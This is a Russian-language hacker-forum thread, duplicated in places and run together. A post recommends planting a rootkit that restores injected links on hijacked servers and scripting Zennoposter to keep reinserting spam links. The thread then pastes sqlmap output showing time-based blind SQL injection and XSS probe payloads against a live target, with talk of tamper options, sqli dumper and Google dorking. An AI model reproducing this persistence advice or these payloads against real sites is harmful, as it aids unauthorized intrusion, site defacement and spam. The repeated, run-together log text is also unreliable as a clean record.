Многие работают только по мыло+пасс
1) Лучшее решение - руткит на сервере с проверкой контрольных сумм файлов: обновляется файл с кодом - заменяешь его. Быдло-решения - проверка внешними скриптами наличие ссылок на сайте + если убраны - теми же скриптами их обновляешь (как работали олдскул ифреймеры), пока доступы не сдохнут. Ты можешь заказать скрипты для Зеннопостера за копейки с этим функционалом.
Просматривается любовь к зеннопостеру
[01:53:45] [PAYLOAD] 1",.(.',)(,
[01:53:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:53:46] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[01:53:46] [PAYLOAD] 1'IitGnV<'">IKOQYW
[01:53:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:53:46] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks[01:54:14] [PAYLOAD] 1') AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- gcJk
[01:54:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:54:15] [PAYLOAD] 1' AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- tHmF
[01:54:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:54:15] [PAYLOAD] 1" AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- SltN
[01:54:16] [PAYLOAD] 1) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND (1282 BETWEEN 1282 AND 1282
[01:54:16] [PAYLOAD] 1)) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND ((9502 BETWEEN 9502 AND 9502
[01:54:17] [PAYLOAD] 1))) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND (((6051 BETWEEN 6051 AND 6051
[01:54:18] [PAYLOAD] 1 AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)
[01:54:19] [PAYLOAD] 1') AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND ('TLPt'='TLPt
[01:54:19] [DEBUG] got HTTP error code: 500 ('Internal Server Error')[01:53:45] [PAYLOAD] 1",.(.',)(,
[01:53:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:53:46] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[01:53:46] [PAYLOAD] 1'IitGnV<'">IKOQYW
[01:53:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:53:46] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks[01:54:14] [PAYLOAD] 1') AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- gcJk
[01:54:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:54:15] [PAYLOAD] 1' AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- tHmF
[01:54:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[01:54:15] [PAYLOAD] 1" AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)-- SltN
[01:54:16] [PAYLOAD] 1) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND (1282 BETWEEN 1282 AND 1282
[01:54:16] [PAYLOAD] 1)) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND ((9502 BETWEEN 9502 AND 9502
[01:54:17] [PAYLOAD] 1))) AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND (((6051 BETWEEN 6051 AND 6051
[01:54:18] [PAYLOAD] 1 AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN)
[01:54:19] [PAYLOAD] 1') AND (SELECT 7188 FROM (SELECT(SLEEP(10)))LtxN) AND ('TLPt'='TLPt
[01:54:19] [DEBUG] got HTTP error code: 500 ('Internal Server Error')Пробовал tamper=apostrophemask ?
спс за ответ, но не помогло, да оно пакует символ , но помоему ломает пайлод.
[05:15:15] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLSv1_1' ('error: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond')[06:10:05] [INFO] URI parameter '#1*' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[06:10:05] [INFO] testing 'Generic inline queries'
[06:10:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[06:10:08] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[06:11:26] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[06:12:41] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[06:13:18] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[06:13:51] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[06:14:27] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[06:15:26] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[06:16:04] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[06:16:46] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[06:17:40] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[06:18:37] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[06:18:40] [WARNING] false positive or unexploitable injection point detected
[06:18:40] [WARNING] URI parameter '#1*' does not seem to be injectable
[06:18:40] [CRITICAL] all tested parameters do not appear to be injectable
[06:18:40] [WARNING] HTTP error codes detected during run:sqli dumper, google dorking
